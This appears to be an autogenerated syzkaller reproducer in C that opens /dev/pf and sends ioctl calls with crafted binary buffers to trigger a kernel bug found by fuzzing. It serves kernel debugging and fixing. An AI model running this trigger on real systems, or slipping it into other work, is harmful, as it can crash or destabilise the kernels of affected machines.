// https://syzkaller.appspot.com/bug?id=9d0c17fac0ddf74d41d7c322315fb8f3327ef754 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x1012ul, -1, 0ul); intptr_t res = 0; memcpy((void*)0x20000000, "/dev/pf\000", 8); res = syscall(SYS_openat, 0xffffffffffffff9cul, 0x20000000ul, 2ul, 0ul); if (res != -1) r[0] = res; memcpy((void*)0x20000480, "\x02", 1); syscall(SYS_ioctl, -1, 0xc4704434ul, 0x20000480ul); syscall(SYS_ioctl, r[0], 0xc4704434ul, 0x20000040ul); memcpy((void*)0x20000140, "/dev/pf\000", 8); res = syscall(SYS_openat, 0xffffffffffffff9cul, 0x20000140ul, 0ul, 0ul); if (res != -1) r[1] = res; memcpy( (void*)0x20000580, "\x60\xea\x22\x9d\x34\xf5\xe5\x8a\xc5\x06\xb9\xf9\x4f\xd1\x69\xe0\x82\x17" "\x39\x99\xd2\xdf\xab\x9e\xe7\x37\x7f\xe9\x95\x4d\x8c\x16\xd7\x80\xe1\xe3" "\x4d\xcb\xa4\x7a\x53\xcd\xaf\xb8\xe5\xa3\xfc\x1e\xb4\xd6\xda\x05\x2d\x31" "\xdd\xe4\x0b\x93\xa1\xae\x22\xfe\xfc\x4b\xdb\x98\x8c\x0b\xb3\x02\xb8\x46" "\xac\x3d\xdb\x8b\x89\x88\xc4\xaa\x39\x78\x7c\x38\xa9\xde\xe7\xe2\x2c\x4e" "\xd7\x36\x0d\x22\xf6\x37\x32\x87\x17\x7f\x8a\x8e\x0c\x9b\xc4\x0f\x9f\x86" "\xdc\xdc\xe7\xc2\xd7\x66\xca\x8f\x22\xc4\x05\xd0\xc5\x08\x85\x29\x02\x39" "\x80\x7f\xde\xf2\x55\xc2\xa8\x4c\xc0\xc9\x17\xb9\x79\x50\x88\x24\x4b\x10" "\xdd\xe0\xad\xe8\x63\x27\x6c\xb0\xa4\x6e\xb8\x22\xaa\x4a\xe3\xb9\xee\x2d" "\x03\x43\x2a\x91\x64\xe0\x07\xd6\xba\x93\xfa\xc6\x9a\xfb\x07\xf4\xc4\x97" "\x85\xe7\x9f\x53\x24\xe8\xfb\xd3\xd6\xbe\x52\x01\x45\x28\xdc\x95\x77\x06" "\xa7\xeb\x88\x16\x2d\x99\x69\xb7\xaa\xed\x83\xd3\x93\x2d\x5b\x38\x12\xc0" "\x74\xe3\x5e\x1e\x57\x03\xa2\x56\xa2\x2e\x25\x55\x25\xb8\xc1\x99\x42\xce" "\x6b\x6a\x7d\x0b\x86\x8d\x04\x3b\xee\x4b\x78\x62\x65\xf6\x55\xc5\xcb\x26" "\x73\x51\x5f\x31\x05\xaf\xeb\x0b\x90\xf2\x92\x8b\xa8\x9e\xe7\xaa\xfc\x41" "\x94\xb7\x94\x76\x79\xea\x60\xe0\x86\xf0\x8a\x0c\x07\x9e\x4f\x75\xc3\x5d" "\x26\x85\x30\x73\x8e\x8c\xf4\x1c\x59\xf0\x8c\xf9\x70\x86\xec\x72\x61\xfe" "\xef\x40\x9e\x25\xe2\xec\xcb\xd6\x5f\x75\x0f\xa3\xa1\xf4\x15\x0f\xae\xdd" "\x9e\x8e\xc2\x3d\xc6\x93\x8b\x3f\x1d\x43\xd8\xef\x9c\x2a\xf7\x29\x11\x67" "\xf6\x33\x1b\x77\xbd\x4f\xa5\x28\x41\x29\xce\x0f\x90\xfa\xb7\xe3\x4d\x72" "\x03\x1c\xda\x96\x76\x76\xfc\xbd\x52\x9a\xbd\x49\x8e\x46\xc8\xf5\x00\x7a" "\xfd\x2c\x76\xb0\x83\xbf\x65\xb5\x33\x3b\x5a\x72\xc4\x08\x64\x1a\x00\xf6" "\x31\x09\xa2\x86\xae\x21\x16\xce\xb7\x92\xa2\x91\x20\x21\xbb\xff\x23\xa4" "\x47\x73\x3a\x70\xc3\x1d\x90\x6b\x1c\xb9\x09\x02\x84\xab\x52\xf8\xc6\x0d" "\x9b\xe0\xa4\xce\xea\x6e\x69\x98\x33\x7a\x9e\x52\x06\xde\x56\xa7\xe6\x45" "\x18\xe4\xbf\x29\xcc\x93\xcb\x6e\x56\x25\xbc\xea\x6a\x60\xb8\xe6\xd5\xb8" "\x8f\x30\x67\x87\xb6\xa2\x36\x64\xb9\x96\x65\x0f\x17\xfb\xca\x34\xf7\x22" "\x7a\x09\xb5\xdb\xfe\xb0\xf0\xa5\x04\xf7\x09\xdb\x19\x35\xba\x88\xd4\x1d" "\x4f\x37\x4e\xc6\x33\xc3\xe1\x90\x23\xd2\xaa\xf5\xe5\x66\x56\xaf\xe8\x93" "\x2c\xc2\xcd\x18\x52\xcc\xe2\x20\x67\x87\xd6\x05\x9e\xc0\x9e\xb3\x2a\xad" "\xf6\xa3\x83\xfd\x14\xda\xc7\x71\xd1\x7f\x5e\x0d\xa2\xda\xb7\x05\x7b\xb9" "\xf8\xa2\x33\x83\x43\x31\x52\x35\xeb\x31\xad\xbd\xae\x20\xe0\x87\x7d\xfa" "\x21\xa2\x8e\x6f\x3a\x66\x65\xa6\x7d\xcd\xcc\x8e\x40\xc4\x64\x1e\xa6\xda" "\x3c\xc0\x5f\x5b\xcf\xc2\xb1\xf3\x3d\x5f\x7f\x5b\x17\x39\xd9\xbe\xc7\x2c" "\x1e\xf7\xf1\xbb\x3a\xd5\x71\x0c\x20\x0e\x09\xc4\x41\x08\xa9\x63\xd9\x63" "\x82\x34\xaa\x82\x05\x70\xe4\x03\x8c\xd4\x3d\x33\x7d\x0b\x14\x32\xc1\x1c" "\xc3\xb0\x32\xe2\xcf\x73\xcf\x38\x96\x3f\xba\x60\x6d\x37\x57\xd0\x9c\x05" "\xc9\x23\xf4\x2e\x54\x7d\x1e\x3b\x2c\xc9\xd0\x70\xd8\x4f\xcf\xfc\xac\x45" "\x87\xe7\x4f\x81\xeb\xb7\xa9\x6c\xfc\x77\x4d\x49\x07\xe1\x39\x91\xce\x48" "\x30\xf9\x95\xb3\x5f\x2e\x5d\xf7\x09\x2d\xa8\xd2\x00\x7a\x2e\xee\xa1\x2e" "\x0d\xb0\xd5\x3b\xa9\xc5\xfa\x92\x9b\x50\x98\x58\x5f\x3d\x6a\x49\x52\x0d" "\xa8\x7e\x04\x50\xf9\x7e\x40\x2f\xf3\xbe\x89\x04\xa7\x43\xef\xc5\xe4\x2d" "\x5c\x63\xd2\x1e\x77\x6e\xfd\xa9\xfa\xd3\x5f\xf2\x24\x0c\x1f\x44\xc6\x1e" "\x69\xdb\xf3\x09\xca\x49\x8d\xcd\xbf\xe9\x84\xe7\x69\x30\xdc\x85\xba\x7b" "\x98\xe3\x66\x03\x80\x20\x1a\x97\xf5\xbf\xb5\xdf\x8e\x7d\xf0\x26\xd6\xcb" "\x4d\x93\x65\xa0\x91\x07\xd1\xa8\x08\x23\xa9\xe4\x3f\xd3\xf1\x01\xf8\x0e" "\x08\x1d\x10\x9b\xd0\x59\xd9\x69\xe9\x14\xce\x2d\x00\x18\x27\x2c\x2b\x66" "\x14\x82\x36\x10\xed\x07\xd2\xa0\x5c\xbb\x6b\x48\xf4\x40\xe0\x9f\xf5\x6a" "\xcd\x91\xe6\xcc\xb2\xf1\xe7\x78\x60\x98\x9e\x39\xa1\x14\x12\xab\xb0\x53" "\xa8\x27\x0d\xa5\xe8\x7b\xc7\x41\x74\xc0\x82\xe4\x6b\x30\x49\x72\x7b\x37" "\xef\xce\x80\xdb\x25\x36\x7b\x76\xf6\xd1\x75\xee\xd3\x2d\x74\x1c\x30\xf7" "\x1f\x8d\xf2\x22\x25\x41\x86\x71\x68\xe4\x47\x44\x1d\x58\xee\x2f\x75\x1e" "\x63\x27\x45\xe6\x66\xcd\x1d\xf1\xa8\x16\x64\x3e\x31\xc6\xa3\xf4\xc6\x8c" "\x4c\x52\x6e\xc8\x11\x1e\x91\x7c\xb1\x61\x4f\x49\xea\x50\x65\xe2\x78\xb0" "\x08\xcb\x06\x83\x93\x53\xfc\xed\x75\x26\xec\x0a\xa7\xa6\xff\x77\x2b\xb2" "\xad\x06\xe4\x41\xec\x2f\xae\x6e\xcd\x5e\xac\x9c\x47\xc9\x61\x01\xc3\x18" "\x6a\x69\xdb\x60\x11\xa6\xe1\x1a\xa0\xfc\x2e\x16\x63\xd1\x78\xe1", 1024); memcpy((void*)0x20000980, "\x74\x98\x79\x1c\xdc\x21\xfb\x1a\x50\xa2\xc1\xe1\xfa\xd2\xc9\xdb\x0a" "\xb2\x2f\xc4\x9c\x56\x91\x5c\xd1\x27\xe4\x75\xa6\x2f\x9d\xcc", 32); *(uint32_t*)0x200009a0 = 0; *(uint8_t*)0x200009a4 = 0; *(uint64_t*)0x200009a8 = 0; *(uint64_t*)0x200009b0 = 0x800000428; *(uint64_t*)0x200009b8 = -1; *(uint64_t*)0x200009c0 = 0; *(uint64_t*)0x200009c8 = 0x1ff; *(uint64_t*)0x200009d0 = 0; *(uint64_t*)0x200009d8 = 0x40000000000; *(uint64_t*)0x200009e0 = 0; *(uint32_t*)0x200009e8 = 0; syscall(SYS_ioctl, r[1], 0xc4504441ul, 0x20000580ul); return 0; }